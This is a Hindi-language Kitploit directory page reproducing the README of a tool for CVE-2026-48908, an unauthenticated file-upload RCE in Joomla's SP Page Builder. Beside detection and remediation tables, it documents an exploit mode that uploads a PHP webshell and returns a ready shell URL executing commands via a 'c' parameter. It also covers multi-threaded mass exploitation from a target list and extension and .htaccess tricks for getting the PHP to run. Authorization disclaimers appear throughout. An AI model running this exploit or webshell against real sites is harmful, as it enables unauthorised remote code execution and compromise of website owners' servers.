Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48908-by-yora — SP Page Builder को प्रभावित करने वाले CVE-2026-48908 के लिए निष्क्रिय सुरक्षा जाँचकर्ता। | Kitploit
उपकरण/GitHubGitHub/yora1928/cve-2026-48908-by-yora
टोहीभेद्यता स्कैनरवेब भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubyora1928/cve-2026-48908-by-yora

CVE-2026-48908-by-yora

28 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

SP Page Builder को प्रभावित करने वाले CVE-2026-48908 के लिए निष्क्रिय सुरक्षा जाँचकर्ता।

रिपॉजिटरी देखें
साझा करें

🔐 CVE-2026-48908 स्कैनर + PoC (सुरक्षित एक्सप्लॉइट)

[ Joomla SP Page Builder — बिना प्रमाणीकरण RCE ]

Python License Joomla

yora द्वारा विकसित


📌 इस प्रोजेक्ट के बारे में

यह प्रोजेक्ट एक सुरक्षा अनुसंधान उपकरण है जिसे yora द्वारा Joomla के लिए SP Page Builder एक्सटेंशन में CVE-2026-48908 भेद्यता का पता लगाने और साबित करने के लिए विकसित किया गया है।

यह भेद्यता हमलावर को बिना प्रमाणीकरण के asset.uploadCustomIcon एंडपॉइंट के माध्यम से PHP फ़ाइल अपलोड करने की अनुमति देती है, जिसे बाद में सार्वजनिक निर्देशिका में निकाला जाता है और निष्पादित किया जा सकता है → रिमोट कोड निष्पादन (RCE)।

प्रभावित संस्करण: SP Page Builder 1.0.0 से 6.6.1 तक (6.6.2 में ठीक किया गया)।

⚠️ चेतावनी – इसका उपयोग केवल उन सिस्टम पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति है। बिना अनुमति के उपयोग अवैध है।


👨‍💻 डेवलपर

इस प्रोजेक्ट को विकसित और प्रबंधित किया गया है:

  • yora — GitHub • Twitter

सुरक्षा समुदाय और स्वतंत्र शोध द्वारा समर्थित।


✨ प्रमुख विशेषताएं


🚀 इंस्टॉलेशन

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/yora1928/CVE-2026-48908-by-yora.git
cd CVE-2026-48908-by-yora

डिपेंडेंसी इंस्टॉल करें

root@kitploit:~
python -m pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0

📖 उपयोग गाइड

1️⃣ केवल डिटेक्शन (बिना एक्सप्लॉइटेशन)

root@kitploit:~
python scanner.py --url https://target-website.com

उदाहरण आउटपुट:

root@kitploit:~
[🔴 CONFIRMED] https://target-website.com
    ├─ SP detected
    ├─ v6.3.1
    └─ Vulnerable version 6.3.1 and endpoint open

2️⃣ डिटेक्शन + RCE प्रमाण (सुरक्षित एक्सप्लॉइट)

root@kitploit:~
python scanner.py --url https://target-website.com --exploit

क्या होता है:

  • टूल असुरक्षित संस्करण का पता लगाता है।
  • गुप्त टोकन के साथ PHP फ़ाइल अपलोड करता है।
  • निष्पादन सुनिश्चित करने के लिए उस फ़ाइल तक पहुंचने का प्रयास करता है।
  • सफल होने पर, उपयोग के लिए तैयार Shell URL प्रदर्शित करता है।

सफल आउटपुट का उदाहरण (वास्तविक परीक्षण से):

root@kitploit:~
[*] Scanning: https://target-website.com
[*] Target confirmed vulnerable. Running adaptive exploit...
[*] Trying method: php                 -> EXECUTED
[🔴 CONFIRMED] https://target-website.com
    ├─ SP detected
    ├─ v6.3.1
    └─ Vulnerable version 6.3.1 and endpoint open
    └─ ✅ RCE confirmed via PoC upload!
         Shell URL: https://target-website.com/media/com_sppagebuilder/assets/iconfont/icoyjdehd/fonts/fpqofpk.php?t=7f5e90gcxx0j0r51&c=<cmd>
         Created dirs: media/com_sppagebuilder/assets/iconfont/icoyjdehd

Shell URL का उपयोग कैसे करें:

  • c पैरामीटर के साथ URL तक पहुंचें, जिसमें वह कमांड हो जिसे आप चलाना चाहते हैं।
  • उदाहरण: ...?t=7f5e90gcxx0j0r51&c=whoami
  • कमांड का आउटपुट पेज पर दिखाई देगा।

🔐 टोकन (t=...) गुप्त है – शेल URL अनधिकृत लोगों के साथ साझा न करें।


3️⃣ फ़ाइल से कई टारगेट स्कैन करें

एक targets.txt फ़ाइल बनाएं (प्रति पंक्ति एक URL):

root@kitploit:~
https://site1.com
https://site2.com

चलाएं:

root@kitploit:~
python scanner.py --list targets.txt --threads 5

एक्सप्लॉइट के साथ:

root@kitploit:~
python scanner.py --list targets.txt --threads 5 --exploit

4️⃣ परिणाम JSON फ़ाइल में सहेजें

root@kitploit:~
python scanner.py --url https://target.com --output reports/hasil.json

5️⃣ क्लीनअप (आर्टिफैक्ट्स हटाएं)

पूरा होने के बाद, बनाई गई निर्देशिकाओं को साफ करें:

root@kitploit:~
python scanner.py --url https://target.com --exploit --cleanup

नोट: --cleanup मैन्युअल रूप से चलाने के लिए rm -rf कमांड दिखाता है (क्योंकि लिखने की अनुमति सीमित हो सकती है)। यदि आपके पास FTP/SSH एक्सेस है, तो Created dirs में सूचीबद्ध निर्देशिकाओं को हटा दें।


📊 वर्गीकरण परिणामों की व्याख्या


📁 JSON रिपोर्ट का उदाहरण

scan_result.json फ़ाइल में एकत्रित सभी साक्ष्य शामिल हैं:

root@kitploit:~
{
  "scanner": "CVE-2026-48908 Scanner + Exploit",
  "scan_time": "2026-08-13T10:30:00.123456+00:00",
  "total_targets": 1,
  "results": [
    {
      "target": "https://target.com",
      "classification": {
        "status": "CONFIRMED",
        "confidence": "high",
        "reasoning": ["Vulnerable version 6.3.1 and endpoint open"],
        "evidence_summary": ["SP asset at /components/..."]
      },
      "exploit_result": {
        "upload_success": true,
        "access_success": true,
        "shell_url": "https://target.com/media/.../fpqofpk.php?t=TOKEN&c=<cmd>",
        "created_dirs": ["media/com_sppagebuilder/assets/iconfont/icoyjdehd"]
      }
    }
  ]
}

📁 प्रोजेक्ट संरचना

root@kitploit:~
CVE-2026-48908-by-yora/
├── scanner.py          # File utama (deteksi + exploit)
├── requirements.txt    # Dependensi Python
├── README.md           # Dokumentasi ini
├── SECURITY.md         # Kebijakan keamanan dan pelaporan
├── LICENSE             # Lisensi MIT
├── detection/          # (opsional) modul deteksi tambahan
├── poc/                # (opsional) PoC alternatif
└── reports/            # Tempat menyimpan hasil JSON (otomatis)

🔒 नैतिकता और जिम्मेदारी

  • इस टूल का उपयोग केवल उन सिस्टम पर करें जिनके आप स्वामी हैं या जिन्होंने आपको लिखित अनुमति दी है।
  • इसका उपयोग इनके लिए न करें:
    • इंटरनेट पर यादृच्छिक स्कैनिंग।
    • हमला करने के लिए असुरक्षित टारगेट इकट्ठा करना।
    • दूसरों के सिस्टम तक अवैध पहुंच।
  • पूरा होने के बाद, सभी आर्टिफैक्ट्स हटाएं (अपलोड की गई फ़ाइलें और निर्देशिकाएँ)।
  • लेखक (yora) इस टूल के दुरुपयोग के लिए जिम्मेदार नहीं है।

इस टूल का उपयोग करके, आप सहमत हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं।


📬 योगदान और रिपोर्टिंग

यदि आपको कोई समस्या मिलती है या योगदान देना चाहते हैं, तो कृपया इस रिपॉजिटरी में Issue या Pull Request खोलें।

सुरक्षा रिपोर्ट के लिए, SECURITY.md में दिए गए दिशानिर्देशों का पालन करें।


📜 लाइसेंस

यह प्रोजेक्ट MIT License के तहत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।


🙏 श्रेय

  • CVE खोज: CERT Vanuatu, Censys, Check Point
  • अनुसंधान और PoC कार्यान्वयन: yora और सुरक्षा समुदाय।

yora द्वारा ❤️ के साथ विकसित

टूल डाउनलोड करें
विशेषताविवरण
🔍 कंपोनेंट डिटेक्शनविभिन्न स्रोतों (robots.txt, administrator, asset, HTML) से Joomla और SP Page Builder का पता लगाता है।
📌 वर्जन फ़िंगरप्रिंटCSS/JS, मेटा टैग और मैनिफ़ेस्ट फ़ाइल से SP Page Builder के संस्करण की पहचान करता है।
🧪 एंडपॉइंट सत्यापनबिना प्रमाणीकरण के asset.uploadCustomIcon तक पहुंच का परीक्षण करता है।
📊 स्मार्ट वर्गीकरणपरिणामों को कारण और विश्वास स्तर के साथ CONFIRMED / LIKELY / NOT_VULNERABLE / UNKNOWN में वर्गीकृत करता है।
🚀 अनुकूली एक्सप्लॉइटयदि --exploit उपयोग किया जाता है, तो टूल RCE को सुरक्षित रूप से साबित करने के लिए विभिन्न PHP एक्सटेंशन (.php, .php3, .phtml, .PHP, आदि) और .htaccess आज़माता है।
📁 JSON आउटपुटऑडिट और रिपोर्ट के लिए सभी साक्ष्य .json फ़ाइल में संग्रहीत किए जाते हैं।
⚡ मल्टी-थ्रेडिंग--list और थ्रेड सेटिंग के साथ एक साथ कई टारगेट स्कैन करें।
🧹 क्लीनअप--cleanup अपलोड की गई आर्टिफैक्ट्स को हटाने के लिए कमांड दिखाता है।
स्थितिअर्थअनुशंसित कार्रवाई
🔴 CONFIRMEDSP Page Builder मौजूद है, असुरक्षित संस्करण (≤ 6.6.1) है, और asset.uploadCustomIcon एंडपॉइंट बिना प्रमाणीकरण के एक्सेस किया जा सकता है। असुरक्षित।SP Page Builder को तुरंत 6.6.2 या उससे नए संस्करण में अपडेट करें। यदि --exploit का उपयोग किया गया है, तो अपलोड की गई आर्टिफैक्ट्स हटा दें।
🟡 LIKELYSP मौजूद है, संस्करण असुरक्षित है, लेकिन एंडपॉइंट की प्रमाणीकरण स्थिति की पुष्टि नहीं की जा सकी है। संभवतः असुरक्षित।बिना लॉगिन के index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon एंडपॉइंट तक पहुंचकर मैन्युअल सत्यापन करें। यदि यह लॉगिन पर रीडायरेक्ट नहीं होता है, तो यह असुरक्षित है।
🟢 NOT_VULNERABLESP Page Builder का संस्करण ≥ 6.6.2 (पहले से ठीक) मौजूद है। सुरक्षित।कोई और कार्रवाई आवश्यक नहीं है।
⚪ UNKNOWNSP Page Builder मौजूद नहीं है, या संस्करण की पहचान नहीं की जा सकती है, या डेटा अपर्याप्त है।मैन्युअल रूप से जांचें कि SP Page Builder इंस्टॉल है या नहीं। यदि हाँ, तो /administrator/components/com_sppagebuilder/ में sppagebuilder.xml फ़ाइल के माध्यम से संस्करण का पता लगाने का प्रयास करें।
❌ ERRORकनेक्शन त्रुटि या टाइमआउट हुआ।इंटरनेट कनेक्शन, फ़ायरवॉल की जांच करें, या --timeout 60 के साथ टाइमआउट बढ़ाने का प्रयास करें।